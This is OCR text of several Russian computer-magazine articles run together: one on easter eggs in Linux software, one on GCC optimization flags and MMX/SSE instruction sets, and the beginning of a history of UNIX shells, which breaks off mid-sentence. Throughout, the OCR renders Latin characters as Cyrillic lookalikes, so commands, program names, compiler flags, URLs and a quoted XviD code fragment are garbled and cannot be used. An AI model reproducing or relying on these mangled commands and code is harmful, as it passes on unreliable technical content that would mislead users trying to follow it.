содержит команда зибо: 

$5ттме5/и5к/вш/5иоо 

I кееі тиск Ъеккег пои. 

ѴЙіеге сЗ-ісЗ. уои Іеагп Со Суре? 

I ' ѵе зееп репдиіпз ккак сап Суре 

ЬеССег ккап ккак . 

Аге уои оп сігидз? 

Есть и просто программы-шутки, например, с 
помощью команды ббаіе можно получать ин- 
формацию об интересующих числах календаря: 

$ О О АТЕ 

Тосіау із Рипдепсіау, Ске 3 8Ск сіау 

оС Скаоз іп Ске УОЬБ 3173 

$ООАТЕ 01 04 2007 

Зѵ/еектогп, Бізсогсі 18, 3173 УОЬБ 

$ ОйАТЕ 01 01 2000 

Зѵ^ееСшогп, Скаоз 1, 3166 УОЬБ 

Чтобы увидеть фразу из первой части знамени- 
той трилогии «Путешествие автостопом по 



Галактике» Дугласа Адамса, открываем редак- 
тор ѵі и набираем «Ьеір 42»: 

$ ѵі 

: кеір 42 

В более ранних версиях ѵі попадалось еще 
одно яйцо. Чтобы его увидеть, необходимо было 
открыть файл ргодгаттегз.М, а если его не 
оказывалось, то создать: 

$ ѵі ргодгашшегз . СхС 

Далее нажатием клавиши <і> следовало перей- 
ти в режим вставки, 1 1 раз нажать на <Еп!ег> 
и на 1 2-ой строке ввести «Вгат Мооіепааг», 
затем открыть новый буфер, нажав последо- 
вательно <СТРЕ-ѴѴ> и <Ы>. Результатом этой 
операции был список команды разработчиков. 

А вот ребята из Оепіоо манией величия не стра- 
дают, почти. Чтобы проверить это, достаточно в 
Оепіоо 2005.1 в терминале набрать: 

# тосІиІез-ирсІаСе уои 
Еггог: I сіоп'С ипсіегзкапсі уои 

Типа моятвоя не понимай. Теперь спросим: «Кто 
тут самый главный?»: 

# ѵ/ко із досі 

гооС рСз/0 Бес 19 15:35 ( : 0 . 0 ) 

Разработчики Кпорріхтоже решили нас немно- 
го порадовать. Открываем консоль, набираем 
«ЬЬ», и шоуточно обеспечено. Да, и обязатель- 
но включи колонки, чтобы не пропустить все 
интересное. Такой вот портфолио АБС 1 1 -а рта . 

О Шутки в дистрибутивах 

Самыми большими любителями поразвлекаться 
в рабочее время оказались ребята из 51І5Е — в 
старых версиях этого дистрибутива спрятано 
порядочное количество яиц. Так, при установке 
5и5Е 7.2 Рго!еззіопаІ, кактолько будетскопиро- 
вано ядро и начнется копирование остальных 
файлов, во второй консоли, куда следует перейти 
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> Релизы ІІЬипІи 



по <С[г[-А(1-Е2>, будет выведено прощальное 
сообщение из «Путешествия автостопом по 
Галактике». Выпуск версии 5и5Е 8.1 как раз 
совпал с десятилетием компании, которое раз- 
работчики пропустить никак не могли. Попробуй 
во время установки дистрибутива остановить 
отсчет времени, нажав на одну из клавиш 
со стрелками и <Р10>. На экране появится 
праздничный торт с фирменным логотипом 
хамелеона, а из динамиков будет раздаваться 
«Нарру ЬігіЬсІау ѣо уои». В версии 5и5Е8. 2 они, 
очевидно, уже просто не смогли остановиться 
— чтобы увидеть здоровающегося хамелеона, 
достаточно при установке нажать <Р5>. 

В дистрибутиве Веб На! имеется файл /изг/ 
(ібехес/гесІЬа!-сгесІі!5, выводящий имена разра- 
ботчиков. Его можно запустить как вручную, так 
и нажав <С!г(-А(!-5Ы[!> и трижды щелкнув мыш- 
кой по фоновому изображению рабочего стола. 

ОЯйца вящерице 

Судя по всему, разработчики веб-браузера 
Могіііа не очень утруждают себя работой, и, 
если хорошо поискать, в любом из браузеров, 
использующихдвижокдеско (Могіііа, Рігеіюх, 
Ѳаіеоп), можно найти много интересного. «И 
наконец зверь пал, и возрадовались неверую- 
щие. ..»ТЬе Ьооко! МогіКа, 7:15 — просмотреть 
эту главу можно, набрав «аЬоиЕтогШа» в ад- 
ресной строке любого из этих браузеров. В свое 
время разработчики ІЕ в версии 4.0 пошутили 
отом, что Могіііа будет крушить компьютеры. 
Команда Могіііа ответила шутникам — для этого 
также необходимо было набрать в адресной 
строке ІЕ«аЬоиІ:то2ІІІа». Причем текст в старых 
версиях отличался, там говорилось отом, что 
«шум миллиона клавиатур, подобно большому 
шторму, должен покрыть Землю». Ну что ж, это 
пророчество уже сбылось. 

Необошлосьбез скрытой саморекламы. Например, 
чтобыузнатьимена разработчиков, принимавших 
участие в создании этого браузера, не надо ходить на 
са йт, достаточно ввести «а ЬоиЪсгесІіІз» — и будет вы- 
веден длинный список. Авот если поошибке набрать, 
вместо ѵѵѵѵѵѵ.доодіе.сот . просто ѵѵѵѵѵѵ.доод . можно 
посмотреть интересный флеш-мультик на 
сайте одного из разработчиков по адресу 



еІерЬапІеддв.сот/боод.Ыт . Аналогичная ситу- 
ация произойдет, если в этих браузерах потянуть 
за любой значок в панели закладок и бросить его 
в рабочем пространстве. Есть и просто развле- 
чения:установив расширение асІсіопз.тогіЦа. 
огдЛігебох/742 и набрав «абоиШісЬепзіпк». можно 
долго наблюдать, как из крана течет вода. 

О Графические приложения 

В консольных утилитах нашлось приличное 
количество пасхальных яиц, но и в графичес- 
ких не обошлось без сюрпризов. Так, тІПС 
был в свое время убран из ОеЬіап именно по 
причине наличия пасхального яйца, причем 
разработчик этого ІПС-клиента постоянно 
менял секреты, что вызывало искреннюю 
радостьу нашедших их пользователей. На- 
пример, если щелкнуть правой кнопкой мыши 
по логотипу в окне АЬои!, можно было увидеть 
прыгающий мяч, а если кликнуть по знач- 
ку, он изменялся. В некоторых версиях для 
этого нужно было набрать «агпіе», а в более 
старых версиях — «[Туе ТРОИТ геріу]: ѴѴНОР! 
ТНѴѴНАСК! 5ЕАР!». В версии 5.5 и выше 
необходимо еще в течение 5 секунд подержать 
<ТаЬ>, а затем <5расе>. 

Перейдем кболее тяжелым приложениям. 
Работая в ѲЫОМЕ, выбираем пункт меню Пип 
ргодгагп (<А11-Р2>, «Выполнить программу»), 
вводим «[гее іЬебвб», затем нажимаем «Рип». 
Теперь по экрану время отвремени будет 
плавать маленькая рыбка ѴѴапба, прихлопнуть 
ее можнотолько вместе с панелью. Не бойся, 
панель восстановится. Если щелкнуть по 
рыбке, она уплывет, но через некоторое время 
обязательно вернется. Есть и другой способ 
вызвать ѴѴапсГу: кликаем правой кнопкой мыши 
по панели, выбираем РапеІіп[о иЗ раза жмем 
<Е>. Убиватьтакже (если нежалко). Но это еще 
не все. Повторно вызываем Рип ргодгагп и 
набираем «дедІ5(гот оиіегврасе» — теперь 
вместе с ѴѴапсГой мы будем отражать нападение 
космических захватчиков. Хотя в новых 51І5Е, 
вместо космических кораблей, возможна атака 
Ѳепе!іса((у ЕпдіпеегесІ Ѳоа! Иагде (ОЕОИ). 

Клон тетриса Ѳпоте!гІ5 позволяетустановить 
любой цвет фона или рисунок, чтобы сделать 



это, достаточно перетащить файл, изображение 
с бітр или Наутилуса в окно программы. 
Разработчики 6ІЧІІ Ѳітртоже время зря нетеряли. 
Чтобы увидеть альтернативный логотип проекта, 
жмем <С!г(> и переходим в «Неір АЬои!». Кстати, 
старые пасхальные яйца бітруже перекочевали в 
разряд фильтров. ЭтобЕЕЗІітеи бЕЕЕоот. 
Хочешьувидеть пасхальное яйцо в ЮЕ Апщ1:а? 
Создай новый депегісДегтіпаІ-проектс 
названием Апітабоп и именем автора Ногве. В 
окне описания введи «ЗЬОѵѵ Ме ТЬЕ АпІтАТіОМ 
поѵѵ». После компиляции по экрану будет бегать 
лошадь. Настала очередь офисных пакетов 
— 5!аг0((ісе (от 6.0) и ОрепО((ісе (от 1.0.1). Дума- 
ешь, что разработчики трудятся, не покладая 
рук? Зря. Открываем текстовый редактор ѴѴгі!е г, 
набираем «5[агѴѴгі[егТеат», нажимаем на 
<ЕЗ> и перед нами команда разработчиков. 

А разработчики табличного редактора Са(с 
пошли еще дальше. Запиши в любую ячейку 
«=Ѳате(«3[агѴѴаг5»)», нажми вводи можешь 
наслаждаться игрой, спасая планету от нашест- 
вия инопланетян. Правда, в некоторых версиях, 
вместо этого, сообщат: «Об по, по! адаіп». 

Но и этого им оказалось мало — они встроили в 
Са(с крестики-нолики. Чтобы поиграть, доста- 
точно в любой из ячеек внутри диапазона А1 :СЗ 
ввести «=6ате(А1 :СЗ;«ТісТасТое»)». Компьютер 
автоматически сделает следующий ход. И так 
далее до победного конца. 

В музыкальном редакторе Аибасі!у тоже не 
обошлось без сюрпризов. Выбираем «Не(р -> 
АЬои! Аибасі!у» и, держа нажатыми клавиши 
<С[г(-А([>, щелкаем средней кнопкой мышки 
по логотипу программы. В результате увидим 
версию ѵѵхѴѴісІдеІв и дату сборки. 

Авотесли в список воспроизведения музыкаль- 
ного проигрывателя Ата гок добавить альбом 
Атагок Майка Олдфильда (кстати, он 13-ый по 
счету), то в процессе прослушивания шестиде- 
сятиминутной смеси электронной музыки можно 
лицезреть список раз работников, участвовав- 
ших в создании проигрывателя. 

Воттакой вот небольшой набор. Вероятно, 
интересные свойства есть и у других программ. 
Найти их нетак-то просто, но главное, что они 
есть. Здесь, как говорится, Гугл в помощь. □С 
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ПОДВОДНЫЕ КАМНИ 
ОПТИМИЗАЦИИ 



РАСКРЫВАЕМ СЕКРЕТЫ КОМПИЛЯЦИИ ПРОГРАММ 



Как правило, программы под *піх распространяются в исходных текстах и предусмат- 
ривают возможность компиляции под различные ЦП с задействованием инструкций 
ММХ, ММХехЦ 85Е, 53Е2, ЗЗЕЗ, 55Е4, ЗЦ]Мо\ѵ!, ЗБ]Мо\ѵ!Ехі и т.д. Зачастую от применя- 
емого компилятора и его ключей принципиальным образом зависят быстродействие 
и стабильность программы. Во всех этих тонкостях не так-то просто разобраться, как 
кажется на первый взгляд. В некоторых случаях попытка форсировать компиляцию 
под 85Е4, круче которого пока ничего нет, заканчивается чуть ли не катастрофой — от 
полного нежелания запускаться до падения производительности в десятки раз. Давай 
посмотрим, почему же так происходит. 



□ Архитектура кремниевых сооружений 

Учет архитектурных особенностей конкретных 
ЦП теоретически способен дать огромный 
выигрыш, но практически языки высокого 
уровня абстрагируют программиста от деталей 
конкретной реализации, перекладывая все 
заботы на плечи компилятора. Но что может 
сделать компилятор? Переупорядочить 
инструкции, выровнять структуры данных по 



кратным адресам, избавиться от ветвлений, 
заменить медленные команды (например, инс- 
трукцию целочисленного деления О IV, также 
отвечающую за взятие остатка) их более быст- 
рыми аналогами и т.д. Во времена господства 
Іпіе180486, Іпіеі Репііигл-І/ІІ и АМй К5/К6, 
когда архитектура и правила оптимизации 
под каждую модель процессора существенно 
отличались, оптимизирующие компиляторы 



временами увеличивали производительность 
в несколько раз. Но, начиная с Репііит Рго, 
процессоры научились оптимизировать код 
самостоятельно, разбивая поток машинных 
команд на микроинструкции, распределяе- 
мые по функциональным устройствами (типа 
АЛУ или блока вещественной арифметики), и 
выполняя их с максимальной эффективностью. 
Сейчас, в началеХХІ века, производительность 
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>Вся правда о 55Ех 



в основном определяется крутостью оптими- 
затора и, естественно, опциями компилятора, 
отвечающими за глубину разворота циклов, 
агрессивность встраивания функций, удале- 
ние «хвостовой» рекурсии и т.д. 

Многообразие ключей оптимизации за- 
трудняет работу с компилятором, и потому 
разработчикам последних пришлось заложить 
в них специальные шаблоны — программист 
просто указываеттип целевого процессора 
и компилятор автоматически выставляет 
оптимальные (с его точки зрения!) параметры 
оптимизации поумолчанию. В частности, 
выбор -тагсЬ=репІіит4 обычно ведет к 
крайне агрессивному развороту циклов и 
встраиванию функций, что приводит к неоп- 
равданному разбуханию кода и, как следствие, 
падению производительности (особенно если 
интенсивно выполняемые циклы вылетаютза 
пределы кэш-памяти первого уровня). 
Экспериментируя с различными ключами 
оптимизации на своем РгезсоМ'е, работающем 
под ядром І_іпих версии 2.4.27, мыщъх пришел 
к выводу, что большинство программ, компи- 
лируемых ѲСС 3.4.3, показываетзначительно 
лучший результат при выборе обобщенной уни- 
процессорной архитектуры І686 (-тагсЫ686 
-тІипе=рге5СоМ), чем при -тагсЬ=рге5С0К, 
уступающем в производительности... даже 
-тагсб=і386. Ключи -тагсЬ=репбитЗ и 
-тагсЬ=репбит4 не обнаружили (на РгезсоН'е!) 
никакой заметной невооруженным взглядом 
разницы (правда, с использованием 
-тагсЬ = репІіит4 компиляция иногда 
проваливается). 

Сначала мыщъх списывал такой эффектна глюк 
этой версии ѲСС и кривизнусвоихлап, умножен- 
ную на градиентупругости хвоста. Но поиск по фо- 
румам показал, что глюк носит характер призрака, 
блуждающего по всем континентам и оставляю- 
щего следы нетолько на форумах, но и в солидных 
исследовательских статьях наподобие «ІпІеІНурег- 
ТЬгеасІіпд оп І_іпих: Рас! ог МуіЬ», переведенный 
мной отрывок из которой следует ниже: 



«Одна-единственная опция компилятора 
способна погубить весь выигрыш в производи- 
тельности, которого вы ожидаете оттехноло- 
гии Нурег-ТЬ геасіі пд , и в некоторых случаях 
проигрыш становится поистине драматичес- 
ким. Например, ядро І_іпих версии 2.4 с опцией 
-ппагсН=і686 выполняется на 33% быстрее, 
нежели с -тагсН=реп1іит4. В худшем случае 
(при выборе неправильных ключей компиля- 
ции) прирост производительности будет 1 6%, 
что составляет л ишь половину ожидаемого 
ускорения. 

Ядро версии 2.6 ведет себя прямо противо- 
положным образом. Использование опции 
-тагсЬ=і686 вызываетснижение производи- 
тельности. Таким образом, мы можем вывести 
следующее эмпирическое правило (по крайней 
мере, для дистрибутива Ребога): надо исполь- 
зовать опцию -тагсЬ=і686 на ядрах семейс- 
тва 2.4 и опцию -тагсЬ=реп!іит4 на ядрах 
семейства 2.6. 

Сперва я думал, что это связано с компилято- 
ром, и протестировал три версии ѲСС на каждом 
из ядер, но... не выявил никакой корреляции 
между версией компилятора и опцией -тагсЬ, 
зато обнаружилась корреляция между ядрами. 
Переход на ядра семейства 2.6 в среднем давал 
10%-ный прирост производительности, по 
сравнению с ядрами семейства 2.4, при условии 
что Нурег-ТЬгеабіпд был активирован». 

Однако приведенное выше эмпирическое пра- 
вило срабатывает далеко не всегда, и опреде- 
лить оптимальную комбинацию ключей можно 
только экспериментально. Но если оптимизация 
под новыетипы процессоров способна вызвать 
обвальное падение производительности, то со 
старымитипами в этом смысле дела обстоят 
вполне нормально. 

Воттолько два соображения. Первое: разра- 
ботчики склонны тестировать и профилировать 
свои приложения под наиболее массовые 
архитектуры (те, за которые отвечает опция 
-тагсб=і686). Новейшие модели процессоров 



большинству членов сообщества Ореп Эоигсе 
недоступны, и оптимизацию приходится выпол- 
нять на ощупь или не выполнять вообще. 
Соображение номердва: программа, откомпи- 
лированная под новейшую модель процессора, 
становится немобильной и нетранспортабель- 
ной. Перенос на соседнюю (моральноустарев- 
шую) машину потребует повторной переком- 
пиляции, а это время... К чему создавать себе 
лишние проблемы, соблазнившись незначи- 
тельным выигрышем в производительности? 

□ Векторные команды 

Помимо наращиваниятактовой частоты, 
расширения посевной площади кэш-памяти 
всехуровней и других архитектурных изысков, 
разработчики процессоров предлагают нам 
наборы векторных команд, ориентированные на 
работу с графикой, цифровым звуком и видео. 
Естественно, сами по себе производительности 
они никак не добавляют и воздействуюттолько 
нате приложения, которые ихявным образом 
используют. Причем компиляторы до векторных 
команд еще недоросли. В лучшем случае они 
вообще не подозревают об их существовании, 
в худшем же — пытаются векторизовать циклы 
(особенноэтим славится ІпіеІС++), но делают 
это наугад и абы как. Поэтому мы будем рас- 
сматривать лишь примеры ручной оптимизации 
приложений под заданный набор векторных 
команд. 

Исторически первымтаким набором оказался 
ММХ, реализованный корпорацией Іпіеі в «пер- 
вопне» и получивший дальнейшее развитие в 
своем расширении ММХехі (где«ех!» — сокра- 
щение от«ехіеп5Іоп»), 

Компания АМй, находясь втяжелых условиях 
конкурентной борьбы, нанесла ответный удар 
в виде своего собственного векторного набора 
команд, зарегистрированного под торговой 
маркой ЗОЫоѵѵ!, что, по замыслу маркетоло- 
гов, символизировалотрехмерную графику и 
должно было привлечь игроманов всех мастей. 
На самомже деле, одной лишьтрехмерной 
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>ММХ— Маігіх МаіЬ 
еХіепзіоп (матрич- 
ное математическое 
расширение). 

51 М 0 — Зіпдіе 
Іпзігисііоп, МиШрІе 
Оаіа (одна инструкция, 
много данных). Это 
торговая марка, объ- 
единяющая подсвоим 
крылом различные 
наборы векторных 
инструкций, обра- 
батывающих более 
одной порции данных 
одновременно, напри- 
мер складывающих 
два массива чисел. 
55Е — в девичес- 
тве І55Е: Іпіегпеі 
Зігеатіпд 51 М й 
Ехіепзіопз (расши- 
рение потоковых 
5ІМ0-инструкций 
интернета). Позднее 
было переименовано 
в Зігеатіпд 51 М О 
Ехіепзіопз (потоковое 
5ІМ0-расширение). 
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оптимизация 



а счет флагов компилятора 



) — базовая оптимизация. Значительно увеличивает скорость исполнения программы. 



-О -ба 

-02 — стандартный уровень оптимизации. По сравнению с '-О' несущественно увеличивает как размер бинарика, таки 
скорость исполнения программы. 

-03 — более агрессивный режим. Это оптимизация уровня '-02' и некоторые (зло) ухищрения в виде флагов '-йпііпе- 
йіпсйопз' и '-ітепате-ге§І5і:ег5'. 

-Оз — оптимизация уровня '-02' в совокупности с флагами, уменьшающими размер. 

іютп-ітате-роіпіюг — указываем компилятору не сохранять указатель на кадр стека (так мы избегаем временных затрат 



на его сохранение и восстановление) . Использование этого флага может благотворно повлиять на скорость исполнения 
прогр аммы. 

-ріре — вместо создания временных файлов, компилятор будет передавать результат работы одного его компонента на- 
прямую другому. В результате время компиляции снижается, а нагрузка на систему увеличивается. Эффект будет заметен 
только при компиляции больших проектов на медленных процах. 



графикой ЗЭКІоѵѵ! ничуть не ограничивался и распростра- 
нял свое влияниетакже и на обработку цифрового видео со 
звуком, то есть фактически представлял собой тотже ММХ, 
только реализованный в другой манере. 

С этого момента между Іпіеі и АМЭ произошел раскол, 
положивший конец совместимости, к которой так стремилась 
АМЭ, а вместе с ней и все программисты. Впрочем, несмотря 
на все протесты со стороны Іпіеі, АМБ скопировала набор 
ММХ, сделав его на долгие годы стандартом де-факто. 

В процессе разработки Репбит III корпорация Іпіеі добавила 
в его лексикон 70 новых векторных инструкций и 8 1 28-бит- 
ных регистров, упакованных в аббревиатуруторговой марки 
55Е. Позднее АМБ перенесла 55Е в поздние модели процес- 
соров АіЫопХР, поскольку без сохранения совместимости с 
лидером рынка она была бы обречена на поражение. 

С выходом Репбит IV появился и новый набор векторных 
инструкций, получивший название 55Е2 (а 55Е во избежание 
путаницы был переименован в 55Е1 ). Помимо команд, опери- 
рующих плавающими числами двойной точности (64 бита), и 
8-, 16-, 32-битных целочисленных инструкций, Іпіеі наконец- 
то устранила досадное ограничение, связанное с побочным 
влиянием 55Е-команд на ММХ-регистры. Программисты 
вздохнули с облегчением, и многие из них окрестили 55Е2 
«должным образом реализованным 55Е1 ». 

Очередная реконструкция состоялась в Ргезсой'ах, добавив- 
ших инструкции, ориентированные на сигнальную обработку, 
прежде доступную только в специальных 05Р-процессорах 
(ОідііаІЗідпаІ Ргосевзог— процессор, обрабатывающий циф- 
ровые сигналы), плюс команды управления виртуальными 
процессорами (а точнее, их ядрами). Обновленный набор, не 
мудрствуя лукаво, обозвали 55ЕЗ. 

Процессорная архитектура, разрекламированная под 
торговой маркой Соге, принесла с собой 16 новых векторных 
инструкций, зарегистрированных под грифом 555ЕЗ, часто 
воспринимаемым редакторами популярныхжурналов как 
случайная опечатка. 

Писком моды стал набор 55Е4, представляющий собой 
кардинально доработанный 555ЕЗ с кучей целочисленных 
инструкций (так полезных аудио- и видеокодекам) и прочими 



соблазнительными новшествами. Первым процессором, 
поддерживающим 55Е4 в железе, а не на бумаге, оказался 
Репгуп, построенный по архитектуре Соге 2. Более подробную 
информацию обо всех вышеперечисленныхтипах инструк- 
ций можно получить у самой Іпіеі: ѵѵѵѵѵѵ.іпіеІ.соппЛесЬпоІодѵ/ 
агсЫіесіиге/пеѵѵ іпзІтисбопз.Ыіпп . 

Хвосту понятно, что 55Е4 круче, чем 55ЕЗ, а 55ЕЗ круче, чем 
ММХ. Подчеркиваю еще раз: это обстоятельство понятно 
только хвосту, то есть оболваненному рекламой пользова- 
телю, уже научившемуся компилировать чужие программы, 
но никогда не программировавшему самостоятельно. Весь 
вопрос втом, какие именно векторные команды выбирает 
программист для решения поставленной перед ним задачи. 
Если набора 55Е2 оказывается вполне достаточно, то зару- 
чаться поддержкой 55ЕЗ/55Е4 совершенно необязательно, 
тем более что это ограничивает круг потенциальных пользо- 
вателей программы. 

Сами по себе векторные команды — это просто лексический 
балласт, а как известно, искусство владения языком (все 
равно каким — машинным или человеческим) определяется, 
в первую очередь, не количеством известных слов, а умением 
выразитьсвою мысльтеми немногочисленными словами, 
которые крутятся в голове. В практическом плане это озна- 
чает, что большинство разработчиков крайне скептически 
относятся к новым наборам инструкций и неохотно включают 
их в свои программы. Но мыживем не в девяностых годах, и 
ММХактивно вытесняется 55Е1 /55Е2. 

Критичные кбыстродействию программы либо определяют 
тип процессора автоматом, либо предоставляют пользо- 
вателю возможность выбрать используемый набор (набо- 
ры) векторных инструкций самостоятельно (такой режим 
получил название «форсированного»). Тут-то большинство 
пользователей и совершают роковую ошибку, выбирая один 
единственный набор — самый «крутой» из всех имеющихся. 
Воттолько производительность от этого никак не увеличи- 
вается и даже, наоборот, уменьшается. Почему? Потому что 
то, что в программе заявлена поддержка «оптимизации под 
55Е4», ровным счетом ничего не значит! Откуда мы знаем, 
какая именно часть кода реально написана под55Е4?! 
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> Черная магия оптимизации белого ПК 



> Репііит III с поддержкой набора векторных инструкций 55ЕЗ 



Это может быть всего пара особо критичных 
функций. Оченьчасто именнотаки происходит. 
Программа на 90% написана на Си, 9% прихо- 
дится на ассемблерные ММХ-модули и 1% — на 
55Ех. Несмотря на то что 55Ех включает в себя 
подмножество ММХ, утилита сопбдиге этого не 
знаети, при выборе одного лишь55Ех, отключа- 
етоптимизированные ММХ-модули, заменяя их 
неоптимизированными Си-аналогами. 

□ От теории кпрактике 

Возьмем какую-нибудь мультимедийную 
программу, например кодекХѵЮ (последнюю 
версию исходных текстов которого можно 
скачать с ѵѵѵѵѵѵ.хѵіб.огд/РоѵѵпІоабзАЗ.О.ЬітІ ). и 
посмотрим, кактеория сочетается с практикой. 
Распаковав архив, ищем контекстным поиском 
что-нибудь вроде «55 Е2» или «ЗРКІоѵѵ» и 
находим в файле сопбд.с следующий фрагмент 
кода, позволяющий пользователю форсировать 
выбор конкретного набора векторных инструк- 
ций, включающих в себя ММХ, ММХехі, 55Е, 
55Е2, ЗРІЧоѵѵ! и ЗРКІоѵѵІЕхІ:: 

$ѵі хѵтсоРЕ-і.і.2/ѵрѵѵ/5кс/сомріе.с 

сазе ІББ_СОММ(Ж : 

сри_Согсе = ІеВІдСЬескесІ (ЫЗІд , 
ІБС_СРБ_ЕОКСЕ) ; 
ЕпаЪІеБІдЭДіпскж (кБІд , 

ІБС_СРБ_ММХ, сри_Согсе) ; 
ЕпаЪІеБІдШіпсІочл/ (ЫЭІд , 

ІБС_СРБ_ММХЕХТ, сри_Согсе) ; 
ЕпаЫеБІдМіпсЗовд' (ЬВІд , 

ІБС_СРБ_83Е, сри_Согсе) ; 
ЕпаЪІеБІдЭДіпскж (ЫЭІд , 

ІБС_СРБ_38Е2 , сри_богсе) ; 
ЕпаЪІеБІдЭДіпсІсж (кБІд , 

ІБС_СРБ_ЗБЖЖ, сри_Согсе) ; 
ЕпаЫеБІдѴ^іпйо’иг (Ь.БІд , 



ІБС_СРБ_ЗБЖЖЕХТ , сри_Тогсе) ; 

Ьгеак; 

Атеперь откроем каталог ./зге и посмотрим, что 
у настам: 26 файлов, оптимизированных под 
ММХ; 6 — под ММХехС 5 — под 55Е2; 2 — под 
ЗРІЧоѵѵ!; 6 — под ЗРІМоѵѵІЕхк Еще наблюдается 
некоторое количество модулей, написанных для 
архитектур Іпіеі Ііапіит, АМР х86-64 и Роѵѵег РС, 
ноо них сейчас разговор не идет (поскольку они 
не являются ни подмножеством, ни надмножес- 
твом рассматриваемых нами наборов векторных 
инструкций). 

Количество функций, написанных на том или 
ином наборе инструкций, подсчитать неслож- 
но, но утомительно, да и без этого видно, что 
55Е отдыхает, и если вырубить ММХ, тоХѵЮ бу- 
дет работать ну очень медленно... С другой сто- 
роны, наличие функций, оптимизированных 
под 55Е, еще не доказывает их превосходства 
над ММХ. Ведь это разные функции, зачастую 
написанные разными программистами с не- 
предсказуемой квалификацией (или отсутс- 
твием таковой). Допустим, в некотором проекте 
содержится большое количество годами 
вылизываемого ММХ-кода, написанного та- 
лантливыми людьми, прекрасно владеющими 
техникой профилировки. Атеперь представим, 
что в ряды разработчиков вливается красно- 
глазый пионер, прочитавший руководство по 
55Е-командам подиагонали и написавший 
чудовищнотормозной код, включенный в фи- 
нальный проект по недосмотру координатора. 
Короче говоря, возникаеттупиковая ситуация. 
Доверять программе автоматический выбор 
векторных команд мы не можем, так как никто 
не знает, насколько хорошо они реализованы, 
а применение форсированной оптимизации 
ограничено неполнотой наших представлений 



о структуре программы. Дотех пор пока мы не 
распотрошим исходные тексты и не прикинем, 
какая часть кода на каких наборах реализо- 
вана, форсированный режим будет давать 
непредсказуемый результат. 

Что же остается? А остается Его Величество 
Эксперимент! Поскольку наборов векторных 
инструкций существует нетакуж и много, 
выбор оптимального сочетания не займет 
большого количества времени. В одних слу- 
чаях более быстрым окажется 55Ех, в других 
— ММХ. Про ЗРІЧоѵѵ! мы помним, нов силу ма- 
лой рыночной доли процессоров АМР скромно 
промолчим. 

□ Заключение 

*піх-системы предоставляют пользователю 
практически неограниченную свободу для 
творчества, оставляя его наедине с массой 
рычагов управления, многие из которых 
вообще никак не подписаны, а подписанные 
содержат магические аббревиатуры, расшиф- 
ровываемые в совершенно других местах. 
Документация (даже если она и присутствует) 
покрывает лишь малую часть вопросов. Это и 
есть расплата за свободу. Если ѴѴіпсІоѵѵз/Мас 
05 X — это «кадиллак», то *піх больше похож 
на трактор, водитель которого способен разо- 
брать мотор с закрытыми глазами и собрать 
его обратно. Многих это коробит. Трудно пред- 
ставить, чтобы какая-нибудь семнадцатилет- 
няя Анастасия читала I піеі Мапиаі и курила 
спецификации на МРЕ6-2 перед запуском 
фильма на 0Ѵ0, но... другие просто не пред- 
ставляют себе, как можно ездить на машине, 
не внеся в нее пару десятков конструктивных 
изменений. Это два мира, и умение компи- 
лировать программы не гарантируетумения 
компилировать их хорошо. т 
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КОМАНДНЫЕ ИНТЕРПРЕТАТОРЫ: СРАВНИТЕЛЬНО-ИСТОРИЧЕСКАЯ ЭПОПЕЯ 



За всю историю существования операционной системы ІШІХ для нее было создано 
огромное количество различных командных интерпретаторов. Некоторые из них 
предопределили дальнейшее развитие шеллов, единицы стали стандартом, а многие 
умерли сразу после рождения. Одни продолжают развиваться и сегодня, другие уже 
не поддерживаются. Как же сориентироваться и сделать правильный выбор? 



ТЬотргопзНеИ 

История командных интерпретаторов И N IX 
началась, каки следовало предполагать, вместе 
с рождением самой операционной системы. 
Шелл, вошедший в поставку первой редакции 
II N IX и написанный Кэном Томпсоном (Кеп 
ТЬотрзоп), был по сегодняшним меркам очень 
простым и примитивным. Все, что он могделать, 
— это читать команды, введенные пользовате- 
лем, и запускать их на исполнение. Об интегри- 
рованном скриптовом языке, автодополнении и 
истории команд, так привычных сегодняшнему 
пользователю ЦІ N IX, никто тогда даже и не 
думал. Хотя возможность перенаправления 
вывода команды в файл уже была реализована. 
В шелл третьей версии ІІЫІХ по предложению 
Дугласа Макилроя (Боидіаз МсІІгоу) была до- 
бавлена возможность перенаправления вывода 
одной команды на входдругой, а в четвертой 
версии она обрела свой нынешний облик 



(оператор «I»). Также были добавлены операто- 
ры Т и доіо, выполненные какотдельные про- 
грамм ы. Разработчики дистрибутива Ргодгатппег'з 
ѴѴогкЬепсЫІКІІХ модифицировали шелл Томпсона, 
чтобы сделатьего более пригодным для программи- 
рования. В результате они выпустили РѴѴВзНеіКили 
МазЬеу зНеІІ, по имени главного разработчика). 

□ ВоигпезИеІІ 

Многочисленные ограничения командного ин- 
терпретатора Томпсона не позволяли применять 
его в качестве полноценного скриптового языка 
и использовать для автоматизации работы. Этот 
факт волновал нетолько самих пользователей, 
но и программистов, привыкших перекладывать 
свою работу на плечи «железного помощника». 

И кто знает, сколько бы продолжаласьтакая 
несправедливость, если бы в один прекрасный 
день Стивен Борн (Біербеп Воигпе) не сел за тер- 
минал и не переписал стандартный шелл ІЭ N IX. 



Именно перу Стивена Борна принадлежит 
тотсинтаксис скриптового языка, который мы 
видим чуть ли не ежедневно, работая в консоли 
или программируя скрипты. И сколько бы поль- 
зователи не ругали все эти бопе, б, езас и другие 
синтаксические причуды, Борн позволил ІІЫІХ 
сделать большой шаг вперед и на много лет пре- 
допределил направление развития командных 
интерпретаторов. 

Основными нововведениями Борна стали: 

• оператор ветвления Т ... Шеп ... еІТ ... еізе ... Т; 

• оператор цикла іюг ... бо ... бопе; 

• оператор выбора сазе ... іп ... езас; 

• переменные окружения; 

• подстановка результата исполнения команды 

• возможность перенаправления файлового 
дескриптора 2 (2>), позволяющая разделять 
потокданных и потокошибок. 

Компания АТ&Т включила командный ин- 
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терпретатор Борна в базовую поставку седьмой 
версии Б N IX, полностью заменив им шелл 
Томпсона. Позднее КэннетАлквист (КеппеіЬ 
АІтциІБі) создал свободный вариант шелла 
Борна под названием Аігтщііібі збеИ (авЬ). 
Сегодня он используется в БеЬіап, ІІЬипіи и 
некоторых ВББ-системах как интерпретатор 
стартовых скриптов, а также входит в состав 
пакета ВизуВох, предназначенного для исполь- 
зования во встроенных версиях Ыпих. 

ОСзЬеІІ 

Можно было бы предположить, что послетого 
какСтивен Борн расширил шелл Томпсона до 
полноценного скриптового языка программи- 
рования, история командных интерпретаторов 
пойдетэволюционным путем и завершится 
где-нибудь на отметке 2 зЬ. Но все повернулось 
совершенно иначе. В 1 979 году небезызвестный 
Билл Джой (ВІИ Ноу], активный разработчик В5й 
ІІКІІХ и создатель редактора ѵі, сделал свою вер- 
сию командного интерпретатора со встроенным 
